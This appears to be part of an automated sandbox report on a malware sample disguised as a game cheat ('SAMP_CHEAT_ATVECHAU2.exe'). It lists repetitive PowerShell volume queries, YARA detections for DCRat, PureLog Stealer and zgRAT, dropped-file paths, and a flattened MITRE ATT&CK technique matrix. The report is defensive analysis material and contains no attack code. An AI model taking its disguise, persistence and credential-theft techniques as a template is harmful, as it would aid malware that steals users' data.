                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeQueries volume information: C:\msportComWin\BridgePortsurrogateserverref.exe VolumeInformation
                                    Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeQueries volume information: C:\msportComWin\BridgePortsurrogateserverref.exe VolumeInformation
                                    Source: C:\Recovery\services.exeQueries volume information: C:\Recovery\services.exe VolumeInformation
                                    Source: C:\Recovery\services.exeQueries volume information: C:\Recovery\services.exe VolumeInformation
                                    Source: C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exeCode function: 0_2_00D0DF1E GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,0_2_00D0DF1E
                                    Source: C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exeCode function: 0_2_00CFB146 GetVersionExW,0_2_00CFB146
                                    Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                                    Stealing of Sensitive Information

                                    barindex
                                    Yara detected DCRat
                                    Source: Yara matchFile source: 0000000A.00000002.1622516211.0000000013530000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: Process Memory Space: BridgePortsurrogateserverref.exe PID: 4340, type: MEMORYSTR
                                    Yara detected PureLog Stealer
                                    Source: Yara matchFile source: SAMP_CHEAT_ATVECHAU2.exe.bin.exe, type: SAMPLE
                                    Source: Yara matchFile source: 0.3.SAMP_CHEAT_ATVECHAU2.exe.bin.exe.74256f9.1.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.SAMP_CHEAT_ATVECHAU2.exe.bin.exe.6b1c6f9.0.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 10.0.BridgePortsurrogateserverref.exe.f10000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.SAMP_CHEAT_ATVECHAU2.exe.bin.exe.6b1c6f9.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.SAMP_CHEAT_ATVECHAU2.exe.bin.exe.74256f9.1.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 00000000.00000003.1259094953.0000000006ACE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000000.00000003.1259921924.00000000073D7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 0000000A.00000000.1285212677.0000000000F12000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
                                    Source: Yara matchFile source: C:\Recovery\services.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Program Files\7-Zip\Lang\jnowHpJlZlXal.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\msportComWin\BridgePortsurrogateserverref.exe, type: DROPPED
                                    Yara detected zgRAT
                                    Source: Yara matchFile source: SAMP_CHEAT_ATVECHAU2.exe.bin.exe, type: SAMPLE
                                    Source: Yara matchFile source: 0.3.SAMP_CHEAT_ATVECHAU2.exe.bin.exe.74256f9.1.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.SAMP_CHEAT_ATVECHAU2.exe.bin.exe.6b1c6f9.0.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 10.0.BridgePortsurrogateserverref.exe.f10000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.SAMP_CHEAT_ATVECHAU2.exe.bin.exe.6b1c6f9.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.SAMP_CHEAT_ATVECHAU2.exe.bin.exe.74256f9.1.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: C:\Recovery\services.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Program Files\7-Zip\Lang\jnowHpJlZlXal.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\msportComWin\BridgePortsurrogateserverref.exe, type: DROPPED

                                    Remote Access Functionality

                                    barindex
                                    Yara detected DCRat
                                    Source: Yara matchFile source: 0000000A.00000002.1622516211.0000000013530000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: Process Memory Space: BridgePortsurrogateserverref.exe PID: 4340, type: MEMORYSTR
                                    Yara detected PureLog Stealer
                                    Source: Yara matchFile source: SAMP_CHEAT_ATVECHAU2.exe.bin.exe, type: SAMPLE
                                    Source: Yara matchFile source: 0.3.SAMP_CHEAT_ATVECHAU2.exe.bin.exe.74256f9.1.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.SAMP_CHEAT_ATVECHAU2.exe.bin.exe.6b1c6f9.0.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 10.0.BridgePortsurrogateserverref.exe.f10000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.SAMP_CHEAT_ATVECHAU2.exe.bin.exe.6b1c6f9.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.SAMP_CHEAT_ATVECHAU2.exe.bin.exe.74256f9.1.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 00000000.00000003.1259094953.0000000006ACE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000000.00000003.1259921924.00000000073D7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 0000000A.00000000.1285212677.0000000000F12000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
                                    Source: Yara matchFile source: C:\Recovery\services.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Program Files\7-Zip\Lang\jnowHpJlZlXal.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\msportComWin\BridgePortsurrogateserverref.exe, type: DROPPED
                                    Yara detected zgRAT
                                    Source: Yara matchFile source: SAMP_CHEAT_ATVECHAU2.exe.bin.exe, type: SAMPLE
                                    Source: Yara matchFile source: 0.3.SAMP_CHEAT_ATVECHAU2.exe.bin.exe.74256f9.1.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.SAMP_CHEAT_ATVECHAU2.exe.bin.exe.6b1c6f9.0.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 10.0.BridgePortsurrogateserverref.exe.f10000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.SAMP_CHEAT_ATVECHAU2.exe.bin.exe.6b1c6f9.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.SAMP_CHEAT_ATVECHAU2.exe.bin.exe.74256f9.1.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: C:\Recovery\services.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Program Files\7-Zip\Lang\jnowHpJlZlXal.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\msportComWin\BridgePortsurrogateserverref.exe, type: DROPPED

                                    Mitre Att&ck Matrix

                                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                                    Gather Victim Identity Information11
                                    Scripting                                    		Valid Accounts11
                                    Windows Management Instrumentation                                    		1
                                    Scheduled Task/Job                                    		11
                                    Process Injection                                    		133
                                    Masquerading                                    		OS Credential Dumping1
                                    System Time Discovery                                    		1
                                    Taint Shared Content                                    		1
                                    Archive Collected Data                                    		1
                                    Encrypted Channel                                    		Exfiltration Over Other Network MediumAbuse Accessibility Features
                                    CredentialsDomainsDefault Accounts2
                                    Command and Scripting Interpreter                                    		11
                                    Scripting                                    		1
                                    Scheduled Task/Job                                    		11
                                    Disable or Modify Tools                                    		LSASS Memory121
                                    Security Software Discovery                                    		Remote Desktop ProtocolData from Removable MediaJunk DataExfiltration Over BluetoothNetwork Denial of Service
                                    Email AddressesDNS ServerDomain Accounts1
                                    Scheduled Task/Job                                    		21
                                    Registry Run Keys / Startup Folder                                    		21
                                    Registry Run Keys / Startup Folder                                    		31
                                    Virtualization/Sandbox Evasion                                    		Security Account Manager1
                                    Process Discovery                                    		SMB/Windows Admin SharesData from Network Shared DriveSteganographyAutomated ExfiltrationData Encrypted for Impact
                                    Employee NamesVirtual Private ServerLocal Accounts1
                                    Exploitation for Client Execution                                    		1
                                    DLL Side-Loading                                    		1
                                    DLL Side-Loading                                    		11
                                    Process Injection                                    		NTDS31
                                    Virtualization/Sandbox Evasion                                    		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
                                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
